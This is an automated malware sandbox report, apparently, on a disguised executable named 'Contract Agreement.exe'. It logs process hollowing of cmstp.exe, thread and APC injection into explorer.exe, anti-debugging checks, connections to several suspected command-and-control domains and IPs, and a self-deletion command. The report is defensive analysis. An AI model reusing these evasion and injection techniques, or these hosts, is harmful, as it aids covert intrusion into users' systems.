          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ACFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ACFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0478C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0478C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04776CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0470849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0471C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0471C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04717D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04733D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04773540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047A3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0477A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047BE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04703D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047C8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04724D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04724D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04724D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0472F527 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0472F527 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0472F527 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046FAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047A8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0470D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0470D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04776DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04776DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04721DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04721DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04721DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047C05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047C05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_047235A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_046F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0472FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0472FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04722581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04722581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04722581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Contract Agreement.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmstp.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.protocolmodern.com
Source: C:\Windows\explorer.exe | Network Connect: 142.111.179.147 80
Source: C:\Windows\explorer.exe | Network Connect: 72.52.251.1 80
Source: C:\Windows\explorer.exe | Domain query: www.nyariorganics.com
Source: C:\Windows\explorer.exe | Domain query: www.bizcert360.com
Source: C:\Windows\explorer.exe | Domain query: www.sapanyc.com
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_6FC71000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Contract Agreement.exe | Section loaded: unknown target: C:\Users\user\Desktop\Contract Agreement.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Contract Agreement.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Contract Agreement.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Contract Agreement.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Contract Agreement.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Contract Agreement.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Contract Agreement.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 310000
Source: C:\Users\user\Desktop\Contract Agreement.exe | Process created: C:\Users\user\Desktop\Contract Agreement.exe 'C:\Users\user\Desktop\Contract Agreement.exe'
Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Contract Agreement.exe'
